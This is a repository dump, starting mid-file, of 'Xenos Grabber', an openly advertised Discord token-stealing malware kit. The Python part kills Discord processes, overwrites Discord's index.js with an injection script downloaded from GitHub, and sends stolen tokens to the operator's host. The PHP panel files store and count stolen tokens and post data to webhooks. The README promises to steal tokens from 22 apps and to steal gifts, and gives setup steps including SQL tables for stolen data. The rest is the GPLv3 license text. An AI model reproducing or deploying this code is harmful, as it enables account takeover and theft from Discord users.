| for token in self.all_tokens:threads_worker.append(threading.Thread(target= check, args=(token,))) 57 | for T in threads_worker:T.start() 58 | for T in threads_worker:T.join() 59 | 60 | def __WriteStub(self): 61 | for path in [f"{os.getenv('LOCALAPPDATA')}\\discord\\",f"{os.getenv('APPDATA')}\\Discord\\",f"{os.getenv('APPDATA')}\\Lightcord\\",f"{os.getenv('APPDATA')}\\discordptb\\",f"{os.getenv('APPDATA')}\\discordcanary\\"]: 62 | try: 63 | end_path = path+"" 64 | if os.path.exists(path): 65 | for c in ["app-", "module", "discord_desktop_core", "discord_desktop_core"]: 66 | for a in os.listdir(end_path): 67 | if c in a:end_path += a + "\\" 68 | 69 | for file in os.listdir(end_path): 70 | if "index.js" in file.lower(): 71 | os.makedirs(end_path+"\\XenosStealer") 72 | open(end_path+"index.js", 'w', encoding="UTF-8").write((urllib.request.urlopen(urllib.request.Request("https://raw.githubusercontent.com/KanekiWeb/Xenos/main/Grabber/Injection/injection.js")).read().decode('utf-8')).replace("%WEBHOOK_LINK%", self.host)) 73 | except:pass 74 | 75 | def __KillInstance(self): 76 | for _ in range(2): 77 | try:import psutil 78 | except:os.system('pip install psutil >nul') 79 | 80 | for proc in psutil.process_iter(): 81 | if any(procstr in proc.name().lower() for procstr in ['discord', 'discordcanary', 'discorddevelopment', 'discordptb']):proc.kill() 82 | 83 | def __Main__(self): 84 | self.__KillInstance() 85 | self.__WriteStub() 86 | self.__Check_Tokens() 87 | for token in self.valid_tokens: 88 | urllib.request.urlopen(urllib.request.Request(self.host+"/api?type=addtoken&token="+token, method='GET')) 89 | 90 | threading.Thread(target=X3N0S().__Main__()).start() 91 | -------------------------------------------------------------------------------- /Inc/Dash.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | Xenos <?php if(!empty($title)) {echo $title;}?> 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 36 |
37 | -------------------------------------------------------------------------------- /Inc/database.php: -------------------------------------------------------------------------------- 1 | getMessage() . "
"; die(); 15 | } 16 | 17 | catch(Exception $e) 18 | { 19 | echo 'Erreur : '.$e->getMessage().'
'; 20 | echo 'N° : '.$e->getCode(); 21 | } 22 | ?> -------------------------------------------------------------------------------- /Inc/fonctions.php: -------------------------------------------------------------------------------- 1 | prepare('SELECT * FROM ' . htmlspecialchars($table)); 22 | $req->execute(); 23 | return $req->rowCount(); 24 | } 25 | 26 | function GetFlagedCount() { 27 | global $bdd; 28 | $req = $bdd->prepare('SELECT * FROM tokens WHERE isflaged = 1'); 29 | $req->execute(); 30 | return $req->rowCount(); 31 | } 32 | 33 | function SendToWebhook($webhook, $data) { 34 | $ch = curl_init($webhook); 35 | curl_setopt_array($ch, array( 36 | CURLOPT_HTTPHEADER => array( 37 | "Content-Type: application/json" 38 | ), 39 | CURLOPT_POST => true, 40 | CURLOPT_POSTFIELDS => $data, 41 | CURLOPT_FOLLOWLOCATION => true, 42 | CURLOPT_RETURNTRANSFER => true 43 | )); 44 | 45 | curl_exec($ch); 46 | curl_close($ch); 47 | } 48 | ?> 49 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
2 |

🐺 Xenos Grabber 🐺

3 |

The most powerfull Discord Token Grabber

4 | Join my Discord Serveur

5 | 6 | 7 |
8 | 9 |


10 | 11 | ## Features 12 | - Infinite Discord Webhook (Can't delete it) 13 | - Use and view your zombies on the panel 14 | - Use our api for manager your zombies 15 | - Xenos uses the discord login system as well as a whitelist of ids 16 | - Our grabber get the tokens on 22 Applications/Browsers 17 | - Recover the account information even if the person changes the password 18 | - Steal all the gifts that the user has 19 | - Detect Flagged/Working Tokens 20 | 21 | ## How to use Xenos 22 | - If you're gay you can follow step by step this tutorial: https://youtube.com/ 23 | - Else follow Step by Step that: 24 | - You need a website to host the files (you can use 000webhost) 25 | - In the phpmyadmin of your website, create a database, then click on it and select above the SQL category, once all that done paste the code below and click on execute. 26 | ```sql 27 | CREATE TABLE `gifts` ( 28 | `id` int(11) NOT NULL, 29 | `gift_name` varchar(100) NOT NULL, 30 | `start_date` varchar(100) NOT NULL, 31 | `end_date` varchar(100) NOT NULL, 32 | `code` varchar(100) NOT NULL, 33 | `claim_at` varchar(100) NOT NULL, 34 | `steal_date` datetime NOT NULL DEFAULT current_timestamp() 35 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; 36 | 37 | CREATE TABLE `tokens` ( 38 | `user_id` text NOT NULL, 39 | `username` text NOT NULL, 40 | `avatar` text NOT NULL, 